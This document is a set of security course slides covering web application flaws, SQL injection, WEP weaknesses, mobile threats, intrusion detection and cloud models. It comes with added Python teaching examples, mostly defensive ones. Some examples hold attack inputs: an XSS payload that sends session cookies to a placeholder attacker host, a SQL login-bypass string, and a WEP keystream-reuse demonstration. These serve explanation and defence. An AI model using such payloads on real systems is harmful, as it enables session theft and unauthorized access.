Banner Grabbing
Banner grabbing is an activity that is used to determine information about services that are being run on a remote computer.
• Banner grabbing is used to identify a system and services.
• It retrieves information from open ports and services.
• Services respond to banner grabs with application-specific information.
• It can use Telnet or a similar raw TCP client (such as netcat) to perform this task; an SSH server, for example, announces its version string as soon as a client connects, while HTTP reveals its Server header only after a request.
277
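A banner grab is just a raw TCP connection plus (for HTTP) a minimal request. The following is an added example (not from the course notes) that performs one with a plain socket against a throwaway local HTTP server, so it runs offline; the server, its deliberately chatty version string and the ephemeral port are constructed for this illustration, and `grab_banner` is my helper, not a tool from the course.

```python
# Added example (not part of the course notes): a socket-level banner grab of
# the kind the slide describes, run against a throwaway local HTTP server so
# it works offline. The fake server, its banner and the port are constructed
# for this illustration.
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def grab_banner(host, port, request=b"HEAD / HTTP/1.0\r\n\r\n", timeout=3.0):
    """Connect, send a minimal request, return (raw response, Server header).
    Many services announce themselves before any request is sent; HTTP needs a
    request first, hence the HEAD."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:          # HTTP/1.0: server closes after the response
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    raw = b"".join(chunks).decode("latin-1", "replace")
    server = None
    for line in raw.split("\r\n"):
        if line.lower().startswith("server:"):
            server = line.split(":", 1)[1].strip()
    return raw, server


class _ChattyHandler(BaseHTTPRequestHandler):
    """Constructed target that leaks a detailed version string, as badly
    configured servers often do."""
    server_version = "Apache/2.2.3 (CentOS)"   # made-up banner
    sys_version = ""                           # hide the Python version the stdlib adds

    def do_HEAD(self):
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):              # keep the example quiet
        pass


def start_test_server():
    """Start the constructed server on an ephemeral port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), _ChattyHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    srv, port = start_test_server()
    raw, banner = grab_banner("127.0.0.1", port)
    print(banner)
    srv.shutdown()
    srv.server_close()
```

Point `grab_banner` at a real host only with authorization; the countermeasure, as the error-message slide that follows says for error pages, is to suppress or genericize the banner (`ServerTokens Prod` on Apache, removing the Server header on IIS and nginx).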
Error Messages
• May reveal too much
information
• Should be suppressed
or sanitized
• Detailed messages
should be accessible
only in development
• Custom error message
pages may be a solution

278
Common Flaws and Attack Messages
• Misconfiguration
  • May be caused by inexperience
• Input validation
  • Database manipulation
  • Database corruption
  • Buffer overflows
  • Inconsistent data
279
Cross-Site Scripting
Cross-site scripting (XSS) is a type of attack that can occur in many forms, but in general it occurs when data of some type enters a web application through an untrusted source.
Stored attacks
• The attac
ker stores malicious code into the vulnerable page.
• The user authenticates in the application.
• The user visits a vulnerable page.
• Malicious code is executed by the user's browser.
Reflected attacks
• This takes the form of an email or via a different web server.
• This occurs when a party injects executable code within an HTTP response.
• Code is not persistent and is not stored.
• It leverages JavaScript, VBScript, or other scripting languages where appropriate.
280
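Both XSS slides (in the session hijacking chapter and here) describe the attack but not the fix, which is context-aware output encoding. The following is an added example (not from the course notes) of a reflected-XSS search page in its vulnerable form next to two encoded forms, one for HTML element content and one for a URL attribute, with the cookie-stealing payload a session hijacker would use. The page template, the payload and the `contains_script` check are constructed for this illustration.

```python
# Added example (not from the course notes): the reflected-XSS pattern from the
# slide in a minimal form, alongside the output-encoding fix. The page
# template and the payload are constructed for this illustration.
import html
from urllib.parse import quote

# Constructed payload: exfiltrates document.cookie, i.e. the session ID.
PAYLOAD = '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>'


def search_page_vulnerable(query):
    """Reflects the untrusted query straight into the HTML response."""
    return f"<h1>Results for {query}</h1>"


def search_page_fixed(query):
    """Context-aware output encoding: HTML-escape for element content, so
    '<' becomes '&lt;' and the browser renders text, not markup."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def attribute_fixed(query):
    """Different context, different encoding: inside a URL attribute,
    percent-encode the value and quote the attribute, so a closing quote or a
    script cannot break out of the href."""
    return f'<a href="/search?q={quote(query, safe="")}">again</a>'


def contains_script(page):
    """Crude check a scanner might use: did a script element survive?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(search_page_vulnerable(PAYLOAD))
    print(search_page_fixed(PAYLOAD))
    print(attribute_fixed('x" onmouseover="alert(1)'))
```

Escaping is only part of the defense: marking the session cookie `HttpOnly` (see the cookie slides later in this chapter) keeps `document.cookie` from reading it even if an XSS does slip through.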
Coding and Design Flaws
Unvalidated Redirects and Forwards
• Caused by bad input validation
• Sends the user to an untrusted location
Insecure Logon Systems (the response differs for each case, letting an attacker tell which part was wrong)
• Entry of an invalid user ID with a valid password
• Entry of a valid user ID with an invalid password
• Entry of an invalid user ID and password

281
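The redirect flaw above is usually fixed badly with a string-prefix check. The following is an added example (not from the course notes) of a same-site redirect validator that lets the URL parser, not `startswith`, decide what the browser will do with the target, and that handles the classic bypasses (protocol-relative `//host`, backslashes, `host.evil`, `host@evil`, `javascript:` and header injection). The application host name and the test inputs are constructed for this illustration.

```python
# Added example (not from the course notes): a check for the "unvalidated
# redirects and forwards" flaw listed above. The application host name and
# the test inputs are constructed for this illustration.
from urllib.parse import urlsplit, urljoin

APP_HOST = "app.example.com"   # assumption: the only host we allow full URLs for


def is_safe_redirect(target, app_host=APP_HOST):
    """True only for same-site targets. Parses with urlsplit so tricks like
    '//evil', backslashes and 'app.example.com.evil' are handled by the parser
    rather than by string prefix checks."""
    if not target or any(c in target for c in "\r\n"):
        return False                     # empty, or header injection attempt
    target = target.replace("\\", "/")   # browsers treat a backslash as a slash
    parts = urlsplit(target)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False                     # javascript:, data:, etc.
    if parts.netloc:                     # absolute or protocol-relative URL
        return parts.hostname == app_host
    # relative target: only a path from the root, never network-path ('//')
    return target.startswith("/") and not target.startswith("//")


def safe_redirect_target(target, default="/"):
    """Return the target if it passes, else the default landing page, resolved
    against the app so the Location header is always absolute."""
    chosen = target if is_safe_redirect(target) else default
    return urljoin(f"https://{APP_HOST}/", chosen)


if __name__ == "__main__":
    for t in ["/account", "//evil.invalid/x", "https://app.example.com@evil.invalid/",
              "/\\evil.invalid", "javascript:alert(1)"]:
        print(f"{t!r:45} -> {safe_redirect_target(t)}")
```

Bare relative paths such as `account` are rejected too; that is deliberate, since a value the application itself never generates is a sign of tampering, and the cost of the false positive is only a redirect to the default page.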
Scripting Errors
Scripting issues
• Upload bombing
• Poison null byte attack
• Default scripts
• Sample scripts
• Poorly written or questionable scripts
282
Cookie Issues
Cookie attributes that control how far a cookie travels and who can read it:
• Secure
• HttpOnly
• Expires
• Path
• Domain
(Browsers now also honor SameSite, which limits when the cookie is sent on cross-site requests.)
283
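The attributes listed above are what a tester checks on every `Set-Cookie` header a target returns. The following is an added example (not from the course notes) of that audit using the standard library's cookie parser over three constructed headers; the cookie names, values and the list of names treated as session cookies are assumptions for this illustration, and the findings are the ones a practitioner would report.

```python
# Added example (not from the course notes): an audit of the cookie attributes
# on the slide, run over constructed Set-Cookie headers. A real check would
# read them from an HTTP response; the headers and the cookie names are made
# up for this illustration.
from http.cookies import SimpleCookie

SAMPLE_HEADERS = [   # constructed responses from three hypothetical apps
    "JSESSIONID=8A3F2C; Path=/",
    "sid=b7c0d9; Path=/; Secure; HttpOnly; SameSite=Lax",
    "auth=xyz; Domain=.example.com; Expires=Wed, 21 Oct 2026 07:28:00 GMT; Secure",
]

# assumption: names that usually carry a session identifier
SESSION_NAMES = ("jsessionid", "sid", "auth", "phpsessid", "asp.net_sessionid")


def audit_set_cookie(header):
    """Return a list of findings for one Set-Cookie header; empty means OK."""
    jar = SimpleCookie()
    jar.load(header)
    findings = []
    for name, morsel in jar.items():
        looks_like_session = name.lower() in SESSION_NAMES
        if not morsel["secure"]:
            findings.append(f"{name}: missing Secure (sent over plain HTTP, sniffable)")
        if not morsel["httponly"]:
            findings.append(f"{name}: missing HttpOnly (readable by injected script)")
        if not morsel["samesite"]:
            findings.append(f"{name}: missing SameSite (sent on cross-site requests)")
        if morsel["domain"].startswith("."):
            findings.append(f"{name}: Domain={morsel['domain']} shares the cookie with every subdomain")
        if not morsel["path"]:
            findings.append(f"{name}: no Path, defaults to the directory of the request")
        if looks_like_session and morsel["expires"]:
            findings.append(f"{name}: session cookie is persistent (Expires set)")
    return findings


def audit_all(headers):
    return {h.split("=", 1)[0]: audit_set_cookie(h) for h in headers}


if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_HEADERS).items():
        print(name, findings or "ok")
```

The `samesite` attribute is known to `http.cookies` from Python 3.8 onward; on older interpreters the parser would treat `SameSite=Lax` as a second cookie.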
Summary
• Definition of a web server
• Definition of a web application
• Can take many forms
• Process and store data on server

285
14: SQL Injection

286
What Is SQL Injection?
SQL injection is where a database is attacked by feeding it attacker-controlled query language (SQL) through the application that sits in front of it.
• SQL injection is typically a result of flaws in an application.
• Attackers can execute arbitrary SQL commands through the web application.
• The goal of attacks is to access information in a database.
• The usual cause of this type of flaw is improper or absent input validation.
287
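The mechanism above, and the first countermeasure at the end of this chapter (avoid dynamic SQL), are clearest side by side. The following is an added example (not from the course notes) of a login check written with string-built SQL against an in-memory SQLite database, next to the parameterized version; the schema, the users and the tautology payload are constructed for this illustration, and the plaintext passwords are there only to keep the example short (a real application stores hashes).

```python
# Added example (not from the course notes): the flaw the slide describes,
# shown as a login check built with dynamic SQL against an in-memory SQLite
# database, next to the parameterized version that the countermeasures slide
# later calls for. The schema, users and payload are constructed for this
# illustration; real applications store password hashes, not passwords.
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("admin", "correct horse battery", "admin"),
                    ("alice", "hunter2", "user")])
    return db


def login_vulnerable(db, username, password):
    """Dynamic SQL: the user's input becomes part of the statement text."""
    query = (f"SELECT role FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """Parameterized query: the driver sends the values separately from the
    statement, so a quote in the input is just data."""
    row = db.execute("SELECT role FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


# Classic payload: closes the string and comments out the password check
# ('--' starts a comment in SQLite, as in most SQL dialects).
PAYLOAD_USER = "admin' -- "
PAYLOAD_PASS = "anything"


def demo():
    db = make_db()
    return (login_vulnerable(db, PAYLOAD_USER, PAYLOAD_PASS),   # 'admin' without a password
            login_fixed(db, PAYLOAD_USER, PAYLOAD_PASS),        # None
            login_fixed(db, "alice", "hunter2"))                # 'user'


if __name__ == "__main__":
    print(demo())
```

The vulnerable statement becomes `... WHERE username = 'admin' -- ' AND password = 'anything'`, so the password clause is never evaluated; the fixed version sends the same input as a bound value and matches nothing.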
Results of SQL Injections
Identity spoofing

Alteration of data

Escalation of privileges

Denial of service

Data extraction

Destruction of data

Altering transactions
288
Server-Side vs. Client-Side Technology
• Database
• Oracle
• SQL Server
• IBM DB2
• MySQL
• Development Languages
• ASP
• ASP.NET
• PHP
• JSP
• Ruby on Rails
291
The Shape of Databases
Database Types
• Relational Database
• Object-Oriented Database
• Distributed Database
For all of its complexities, a database can be described as simply a hierarchical, structured format for storing information for later retrieval, modification, management, and other purposes.
292
Locating a Target

Google hacking is effective.

Customize searches to look for clues.

Look for items such as logon pages.

Look for pieces such as connection strings.

Look for error messages.


298
SQL Injection Countermeasures
• Avoid the use of dynamic SQL; use parameterized queries (prepared statements) so input is bound as data, never spliced into the statement.
• Perform maintenance on the server regularly.
• Deploy intrusion detection systems.
• Harden a system to include the OS and database.
• Exercise least privilege (the application's database account should not own the schema or be able to read tables it never uses).
• Ensure that applications are well-tested.
• Avoid default configurations and passwords.
• Disable error messages in production.

299
Summary
• SQL injection
• Steps for performing SQL injection
• SQL injection techniques
• SQL injection in Oracle
• SQL injection in MySQL
• Attacking SQL servers
• Automated tools for SQL injection
• Countermeasures to SQL injection
300
15: Hacking WiFi
and Bluetooth

301
802.11
• IEEE group responsible for defining interface between
wireless clients and their network access points in
wireless LANs
• First wireless standard was defined in 1997
• Standard was responsible for defining three types of
transmission at the Physical layer
• Diffused infrared : infrared transmission-based
• Direct sequence spread spectrum (DSSS): radio-based
• Frequency hopping spread spectrum (FHSS): radio-
based
302
802.11
• Specified WEP as an optional security protocol
• Specified use of 2.4 GHz industrial, scientific, and
medical (ISM) radio band
• Mandated 1 Mbps data transfer rate and optional 2
Mbps data transfer rate
• Most prominent working groups: 802.11b, 802.11a,
802.11i, and 802.11g

303
A Look at 802.11a
• Sets specifications for wireless data transmission of
up to 54 Mbps in the 5 GHz band
• Uses an orthogonal frequency division multiplexing
encoding scheme rather than FHSS or DSSS
• Approved in 1999
• Typically restricted to corporate deployments

304
A Look at 802.11b
• Establishes specifications for data transmission that
provides 11 Mbps transmission at 2.4 GHz band
• Sometimes referred to as “WiFi” when associated
with WECA-certified devices
• Uses only DSSS
• Approved in 1999
• First widely adopted wireless standard
• Deployed in home, small businesses, and corporations
• Being supplanted slowly by 802.11g and 802.11n
305
A Look at 802.11g
• Responsible for providing raw data throughput over wireless networks at a rate of 22 Mbps or more (the ratified standard delivers up to 54 Mbps in the 2.4 GHz band)
• Draft created in January 2002; final approval in 2003
• Replaced 802.11b in many wireless deployments

306
A Look at 802.11i
• Responsible for fixing security flaws in WEP and 802.1x
• Eliminates WEP, replacing it with Temporal Key Integrity Protocol (TKIP) as an interim measure and AES-CCMP as the long-term cipher
• Ratified in 2004; implementations are certified by the Wi-Fi Alliance as WPA2

307
Wired Equivalent Privacy (WEP)
• Optional security protocol for wireless local area networks defined in the original 802.11 standard and carried into 802.11b
• Designed to provide the same level of security as a wired LAN
• Not considered adequate security without also implementing a separate authentication process and providing for external key management, and, since its cryptographic weaknesses became known, not considered adequate at all

308
Wireless LAN (WLAN)
• Connects clients to network resources using
radio signals to pass data through the ether
• Employs wireless access points (APs)
• Connected to the wired LAN
• Acts as radio broadcast stations that transmit
data to clients equipped with wireless network
interface cards (NICs)

309
How WEP Functions
• Employs a symmetric key to authenticate wireless
devices and to guarantee integrity of data by
encrypting transmissions
• Each of the APs and clients must share the same key
• Client sends a request to the AP asking for
permission to access the wired network

310
How WEP Works
• If WEP has not been enabled (default), the AP
allows the request to pass.
• If WEP has been enabled, the client begins a
challenge-and-response authentication process.

311
Vulnerabilities of WEP
• Problems related to the initialization vector (IV) that it uses to vary the per-frame RC4 key
  • The IV is only 24 bits long and is sent in the clear, so it can be picked up by hackers
  • It is reused on a regular basis, so two frames end up encrypted with the same keystream
• Problems with how it handles keys (the IV is simply prepended to the static shared key)
• Advanced techniques employed by hackers can breach WEP in less than 30 seconds

312
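Why a reused 24-bit IV is fatal follows directly from how WEP keys RC4, and it is worth seeing with real bytes. The following is an added example (not from the course notes): a textbook RC4, WEP-style per-frame keying (IV prepended to the shared key), a recovery of one frame's plaintext from another frame with the same IV using only the known LLC/SNAP header, and the birthday bound on how many frames a random IV lasts. The shared key, IV and frame contents are made up; WEP's CRC-32 integrity value is omitted, and the RC4 here is for demonstration only.

```python
# Added example (not from the course notes): a toy reconstruction of WEP's
# per-frame keying to show why a 24-bit IV that gets reused is fatal. The RC4
# below is a textbook implementation and the frames, key and IV are made up;
# real WEP also appends a CRC-32 ICV, omitted here.
import math


def rc4_keystream(key, length):
    """Plain RC4: key-scheduling then the pseudo-random generation loop."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key, iv, plaintext):
    """WEP per-frame key is IV || shared key; the IV travels in the clear."""
    ks = rc4_keystream(iv + shared_key, len(plaintext))
    return iv, xor(plaintext, ks)


# Every IP-over-802.11 frame starts with the same LLC/SNAP header, so an
# attacker always has these eight bytes of known plaintext.
KNOWN_SNAP = bytes.fromhex("aaaa030000000800")


def recover_with_reused_iv(frame1, frame2, known_plaintext1):
    """C1 ^ C2 = P1 ^ P2 when the keystream is the same, so knowing a prefix of
    P1 reveals the same prefix of P2 without touching the key."""
    iv1, c1 = frame1
    iv2, c2 = frame2
    if iv1 != iv2:
        return None
    n = len(known_plaintext1)
    return xor(xor(c1[:n], c2[:n]), known_plaintext1)


def frames_until_iv_collision(p=0.5, iv_bits=24):
    """Birthday bound: frames needed before a randomly chosen IV repeats with
    probability p. For 24 bits that is only a few thousand frames."""
    return math.sqrt(2 * (2 ** iv_bits) * math.log(1 / (1 - p)))


def demo():
    shared_key = b"\x0b\xad\xc0\xff\xee"          # 40-bit WEP key (constructed)
    iv = b"\x01\x02\x03"                          # the IV that gets reused
    p1 = KNOWN_SNAP + b"plain frame one.........."
    p2 = KNOWN_SNAP + b"SECRET: second frame....."
    f1 = wep_encrypt(shared_key, iv, p1)
    f2 = wep_encrypt(shared_key, iv, p2)
    known = p1[:len(KNOWN_SNAP) + 12]             # SNAP header plus a guessed prefix
    return recover_with_reused_iv(f1, f2, known)


if __name__ == "__main__":
    print(demo())
    print(round(frames_until_iv_collision()), "frames for a 50% IV collision")
```

Many cards made it worse than the birthday bound by starting the IV at zero on every reset and counting up, so the same IVs recurred in the same order; the later statistical key-recovery attacks (FMS, PTW) build on these same keystream relationships rather than on brute force.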
Other WLAN Security Loopholes
• “War” techniques:
• War driving
• War flying
• War walking
• War ballooning
• Unauthorized users can attach themselves to WLANs
and use their resources, set up their own access
points, and jam the network.
• WEP authenticates clients, not users.
• Wireless network administrators and users must be
educated about inherent insecurity of wireless
systems and the need for care.
313
Conducting a Wireless Site Survey
1. Conduct a needs assessment of network users.
2. Obtain a copy of the site’s blueprint.
3. Do a walk-through of the site.
4. Identify possible access point locations.
5. Verify access point locations.
6. Document findings.

314
Summary
• The Many Faces of 802.11
• The Role of Wireless Application Protocol (WAP)
• Wired Equivalent Privacy (WEP)

315
16: Mobile Device
Security

316
Overview
• Quick Overview of Mobile Devices
• Mobile Threats and Attacks
• Countermeasures

317
Overview of Mobile Devices
• Mobile devices
–Mainly smartphones, tablets
• Sensors: GPS, camera, accelerometer, etc.
• Mobile hardware
• Mobile software

318
Mobile Threats and Attacks
• Data Leakage
• Unsecured Wi-Fi
• Network Spoofing
• Phishing attacks
• Spyware
• Broken cryptography

319
Device Malware
• iOS malware: very little
• Android malware growth keeps increasing
• Main categories:
• Trojans
• Monitoring apps/spyware
• Adware
• Botnets

320
Location Disclosure
• MAC, Bluetooth Addresses, IMEI, IMSI, etc. are
globally unique
• Infrastructure based mobile communication
• Peer-to-Peer ad hoc mobile communication

321
Mobile Access Control
• Very easy for attacker to control a mobile device
if he/she has physical access
• Especially if there’s no way to authenticate user
• Tempting target for thieves
• Theft of mobile devices increasing
• Need access controls for mobile devices

322
Authentication: Categories
•Authentication generally based on:
• Something supplicant knows
• Password/passphrase
• Unlock pattern
• Something supplicant has
• Magnetic key card
• Smart card
• Token device
• Something supplicant is
• Fingerprint
• Retina scan
323
Password Cracking
• Passwords are the most widely used form of
authentication
• Usernames and passwords are a commonly targeted
item
• Enumeration may have gathered usernames in some
cases
• Password cracking is used to obtain passwords
• Password cracking refers to a group of techniques
• Is an essential skill for penetration testers
324
What Makes a Password Susceptible to Cracking?
All of the following are short enough that the character classes they use do not save them:
• Passwords that contain letters, special characters, and numbers: stud@52
• Passwords that contain only numbers: 23698217
• Passwords that contain only special characters: &*#@!(%)
• Passwords that contain letters and numbers: meet123
• Passwords that contain only uppercase or only lowercase: POTHMYDE
• Passwords that contain only letters and special characters: rex@&ba
• Passwords that contain only special characters and numbers: 123@$4
• Passwords of 11 characters or less

325
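The list above is qualitative; the following is an added example (not from the course notes) that puts numbers on it by computing the brute-force keyspace implied by each password's character classes and length, and the expected search time at an assumed offline rate of 10^10 guesses per second (a GPU against a fast unsalted hash). The rate is an assumption, and the estimate is a keyspace size, not true entropy: dictionary words and patterns fall far faster than this suggests.

```python
# Added example (not from the course notes): a rough keyspace estimate for the
# password classes on the slide, to show why length dominates character
# variety. The guess rate is an assumption (offline attack on a fast hash).
import math
import string

GUESSES_PER_SECOND = 1e10   # assumption: offline cracking of a fast, unsalted hash


def keyspace_bits(password):
    """Bits of the brute-force keyspace implied by the character classes
    present and the length (an upper bound, not a measure of true entropy)."""
    classes = [string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation]
    alphabet = sum(len(c) for c in classes if any(ch in c for ch in password))
    if alphabet == 0:
        return 0.0
    return len(password) * math.log2(alphabet)


def crack_time_seconds(password, rate=GUESSES_PER_SECOND):
    """Expected time for exhaustive search: half the keyspace on average."""
    return 2 ** keyspace_bits(password) / 2 / rate


def rank(passwords):
    """Weakest first."""
    return sorted(passwords, key=crack_time_seconds)


if __name__ == "__main__":
    # the slide's examples plus one long passphrase for contrast (constructed)
    for pw in rank(["stud@52", "23698217", "&*#@!(%)", "meet123", "POTHMYDE",
                    "rex@&ba", "123@$4", "correct-horse-battery-staple"]):
        print(f"{pw:30} {keyspace_bits(pw):6.1f} bits  ~{crack_time_seconds(pw):12.1f} s")
```

Every seven- or eight-character example on the slide falls in under an hour at this rate regardless of class mix, while a 28-character lowercase-and-punctuation phrase is out of reach; that is the quantitative reason behind the "11 characters or less" bullet.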
An Overview of Malware
• Malware
• Malware is an umbrella term for several forms of
bad software
• Malware has become more destructive and
stealthy
• Has evolved to more readily steal information
• May be useful, but potentially risky to use during a
test

326
Forms of Malware
• Viruses
• Worms
• Trojan Horses
• Rootkits
• Spyware
• Adware
• Ransomware

327
Summary
• Mobile devices are increasingly popular
• There are many threats and attacks against
mobile devices, (e.g., loss/theft, sensitive
information leakage, and location privacy
compromise)
• Mobile access control, information leakage
protection, and location privacy protection, etc.

328
17: Evasion

329
Intrusion Detection System (IDS)
• Detects malicious activity in computer systems
• Identifies attacks in progress (an active IDS, or an intrusion prevention system, can also stop them)
• Supports forensic analysis once an attack is over

330
The Value of IDS
• Monitors network resources to detect intrusions
and attacks that were not stopped by preventative
techniques (firewalls, packet-filtering routers,
proxy servers)
• Compares traffic to signature files that recognize
specific known types of attack
• Expands available options to manage risk from
threats and vulnerabilities

331
Difficulties with IDS
• IDS must correctly identify intrusions and attacks
• True positives
  • Attack correctly reported
• True negatives
  • Benign activity correctly left alone
• False negatives
  • IDS missed an attack
• False positives
  • Benign activity reported as malicious

Handling False Negatives and Positives
• False negatives
• Obtain more coverage by using a combination of
network-based and host-based IDS
• Deploy NIDS at multiple strategic locations in the
network
• False positives
• Reduce number using the tuning process

333
Types of IDS
• Network-based IDS (NIDS)
• Monitors network traffic
• Provides early warning system for attacks
• Host-based IDS (HIDS)
• Monitors activity on host machine
• Able to stop compromises while they are in
progress

334
NIDS
• Uses a dedicated platform for purpose of
monitoring network activity
• Analyzes all passing traffic
• Sensors have two network connections
• One operates in promiscuous mode to sniff passing
traffic.
• An administrative NIC sends data such as alerts to a
centralized management system.
• Most commonly employed form of IDS
335
NIDS Architecture
• Place IDS sensors strategically to defend most
valuable assets
• Typical locations of IDS sensors
• Just inside the firewall
• On the DMZ
• On any subnets containing mission-critical servers

336
NIDS Signature Types
• Signature-based IDS
• Looks for patterns in packet payloads that indicate a
possible attack
• Port signature
• Watches for connection attempts to a known or
frequently attacked port
• Header signatures
• Watch for dangerous or illogical combinations in packet
headers

337
NIDS Reactions
• TCP resets
• IP session logging
• Shunning or blocking

338
Host-Based IDS (HIDS)
• Primarily used to protect only critical servers
• Software agent resides on the protected system
• Detects intrusions by analyzing logs of operating
systems and applications, resource utilization,
and other system activity
• Use of resources can have impact on system
performance

339
HIDS Method of Operation
• Auditing logs (system logs, event logs, security logs,
syslog)
• Monitoring file checksums to identify changes
• Elementary network-based signature techniques
including port activity
• Intercepting and evaluating requests by applications
for system resources before they are processed
• Monitoring of system processes for suspicious
activity
340
HIDS Active Monitoring Capabilities
• Log the event.
• Alert the administrator.
• Terminate the user login.
• Disable the user account.

341
Passive Detection Systems
• Can take passive action (logging and alerting)
when an attack is identified
• Cannot take active actions to stop an attack in
progress

342
Active Detection Systems
• Have logging, alerting, and recording features of
passive IDS, with additional ability to take action
against offending traffic
• Options
• IDS shunning or blocking
• TCP reset
• Used in networks where IDS administrator has
carefully tuned the sensor’s behavior to
minimize number of false positive alarms
343
Signature and Anomaly-Based IDS
• Signature detection
  • Also known as misuse detection
  • IDS analyzes information it gathers and compares it to a database of known attacks, which are identified by their individual signatures
• Anomaly detection
  • Creates a model of normal use and looks for activity that does not conform to that model

344
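The two detection styles above, run side by side over constructed sshd log lines. This is an added example for these notes, not a tool from the course. The signature detector matches a known-bad pattern in each line; the anomaly detector builds its model of normal use from a quiet training day (the mean and standard deviation of failed logins per hour) and flags any hour whose count is more than three standard deviations above that mean. The log lines are generated in the code and are not real system output; the threshold and the field layout are assumptions.

```python
"""Signature (misuse) detection next to anomaly detection over constructed sshd log lines.
Added example for these notes, not a tool from the course.  Log lines are
generated here and are not real system output."""
import re
import statistics
from collections import Counter

LINE_RE = re.compile(
    r"^(?P<hour>\w{3} \d{2} \d{2}):\d{2}:\d{2} \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)"
)

# Signature detection: a known-bad pattern looked up in every line.
SIGNATURES = [("invalid-user-probe", re.compile(r"Failed password for invalid user"))]


def parse(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def signature_scan(lines):
    """Misuse detection: (signature name, line index) for every line matching a known signature."""
    return [(name, i) for i, line in enumerate(lines) for name, pat in SIGNATURES if pat.search(line)]


def failed_per_hour(lines):
    """Failed logins per hour bucket; hours that appear only with successes count as zero."""
    counts = Counter()
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        counts[rec["hour"]] += 1 if rec["result"] == "Failed" else 0
    return counts


def train(lines, sigmas=3.0):
    """Anomaly detection: model 'normal' as mean and std-dev of hourly failed logins."""
    values = list(failed_per_hour(lines).values())
    mean, std = statistics.mean(values), statistics.pstdev(values)
    return {"mean": mean, "std": std, "threshold": mean + sigmas * std}


def detect(lines, model):
    """Apply both detectors to new lines."""
    counts = failed_per_hour(lines)
    return {
        "signature_hits": signature_scan(lines),
        "anomalous_windows": sorted(h for h, n in counts.items() if n > model["threshold"]),
    }


def make_training_lines():
    """Constructed quiet day: a handful of failures per hour plus one success per hour."""
    fails_per_hour = [1, 0, 2, 1, 0, 1, 2, 1, 1, 0, 2, 1, 0, 1, 1, 2, 0, 1, 1, 0, 2, 1, 1, 0]
    lines = []
    for hour, n in enumerate(fails_per_hour):
        for minute in range(n):
            lines.append(f"Jan 10 {hour:02d}:{minute:02d}:00 srv sshd[100]: "
                         f"Failed password for bob from 10.0.0.7 port 4000 ssh2")
        lines.append(f"Jan 10 {hour:02d}:30:00 srv sshd[100]: "
                     f"Accepted password for bob from 10.0.0.7 port 4001 ssh2")
    return lines


def make_monitoring_lines():
    """Constructed next day: one hour with a burst of guesses against non-existent users."""
    lines = [f"Jan 11 03:{m:02d}:00 srv sshd[200]: Failed password for invalid user admin{m} "
             f"from 198.51.100.9 port 5000 ssh2" for m in range(40)]
    lines.append("Jan 11 04:10:00 srv sshd[200]: Failed password for bob from 10.0.0.7 port 4002 ssh2")
    lines.append("Jan 11 04:12:00 srv sshd[200]: Accepted password for bob from 10.0.0.7 port 4003 ssh2")
    return lines


if __name__ == "__main__":
    model = train(make_training_lines())
    print(model)
    print(detect(make_monitoring_lines(), model))
```

The burst hour is caught twice: by the signature, because the "invalid user" wording is a known pattern, and by the anomaly model, which would still have flagged it had the guesses targeted valid usernames. The lone failure at 04:10 is within the model and produces nothing, which is the trade-off the slide describes: the anomaly detector needs a representative baseline, and activity that is both new and low-volume stays below its threshold.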
Honeypots
• False systems that lure intruders and that gather
information on methods and techniques they
use to penetrate networks—by purposely
becoming victims of their attacks
• Simulate unsecured network services
• Make forensic process easy for investigators

345
Honeypot Deployment Goals
• Goal
  • Gather information on hacker techniques, methodology, and tools
• Deployed for
  • Conducting research into hacker methods
  • Detecting attackers inside the organization’s network perimeter

346
Commercial Honeypots
• ManTrap
• Specter
• Smoke Detector
• NetFacade

347
Honeypot Deployment Options
• For research purposes
  • Directly connect a honeypot to the Internet, allowing the owner to collect the most data
• For organizational security
  • Deploy inside the network where it can serve to detect attackers and alert security administrators to their presence

348
Honeypot Design
• Must attract, and avoid tipping off, the attacker
• Must not become a staging ground for attacking
other hosts inside or outside the firewall

349
Summary
• Explained intrusion detection systems and identified some of the major characteristics of intrusion detection products
• Detailed the differences between host-based and network-based intrusion detection
• Identified active detection and passive detection features of both host- and network-based IDS products
• Explained honeypots and how they are employed to increase network security
• Outlined the proper response to an attack

350
18: Cloud Technologies and Security

351
Cloud Computing Service Models
• Software as a Service (SaaS)
  • Examples: Office 365 or Gmail
  • Eliminates the need to install and maintain applications on individual computers
• Platform as a Service (PaaS)
  • Software developers use PaaS as a framework on which to build applications; the OSs, servers, and storage are managed by someone else
• Infrastructure as a Service (IaaS)
  • Self-service model with access to configure and use all levels of infrastructure down to the server

352
Types of Cloud Solutions
• Public Cloud
  • External, hosted by a third party
  • Security issue: control by a third party may be an unacceptable risk
• Private Cloud
  • Built by an individual company for their use only
  • Retains control of security and data
• Hybrid
  • Combines public and private
  • May store sensitive data on private cloud while using size and scale of public cloud for less sensitive data
• Community Cloud
